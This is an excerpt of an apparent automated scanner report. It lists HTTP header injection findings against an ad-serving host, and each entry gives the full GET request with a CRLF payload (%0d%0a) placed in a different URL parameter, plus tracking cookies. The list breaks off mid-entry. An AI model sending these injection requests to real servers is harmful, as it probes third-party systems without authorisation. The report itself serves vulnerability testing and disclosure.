GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ebaaf%0d%0a08b66f30576/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of REST URL parameter 4 is copied into the Location response header. The payload 5b6fb%0d%0a147c7cf0d7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/5b6fb%0d%0a147c7cf0d7/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of REST URL parameter 5 is copied into the Location response header. The payload 8b8e4%0d%0ae7010146c86 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/8b8e4%0d%0ae7010146c86 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the a request parameter is copied into the Location response header. The payload 97bca%0d%0a2b7989845c9 was submitted in the a parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=97bca%0d%0a2b7989845c9&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the dcc request parameter is copied into the Location response header. The payload 2b31b%0d%0ade2b2ba9b51 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=2b31b%0d%0ade2b2ba9b51&dcn=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the dcn request parameter is copied into the Location response header. The payload 4af06%0d%0a498f542876a was submitted in the dcn parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=4af06%0d%0a498f542876a HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the dcp request parameter is copied into the Location response header. The payload 6aeb8%0d%0adcca9fab7ae was submitted in the dcp parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=6aeb8%0d%0adcca9fab7ae&dcc=39972439.232434380&dcn=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
3.32. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d9f87%0d%0aa0e3ab0b09a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r?d9f87%0d%0aa0e3ab0b09a=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the vehicle request parameter is copied into the Location response header. The payload 3441b%0d%0a47ca73b60ee was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=3441b%0d%0a47ca73b60ee&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the ;ord request parameter is copied into the Location response header. The payload 655ab%0d%0a1d53ab93dd7 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=655ab%0d%0a1d53ab93dd7 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 10 is copied into the Location response header. The payload da34d%0d%0ab1265b79bf1 was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/da34d%0d%0ab1265b79bf1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 11 is copied into the Location response header. The payload 845ac%0d%0a5c1762bceb0 was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/845ac%0d%0a5c1762bceb0/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 12 is copied into the Location response header. The payload d803e%0d%0a85430c945da was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/d803e%0d%0a85430c945da/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 13 is copied into the Location response header. The payload 1e26f%0d%0a98d0c7685b was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/1e26f%0d%0a98d0c7685b/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 14 is copied into the Location response header. The payload 2c6a9%0d%0a7020e2fed79 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.
Request
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/2c6a9%0d%0a7020e2fed79/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 15 is copied into the Location response header. The payload 52493%0d%0a224473ccc99 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.
Request
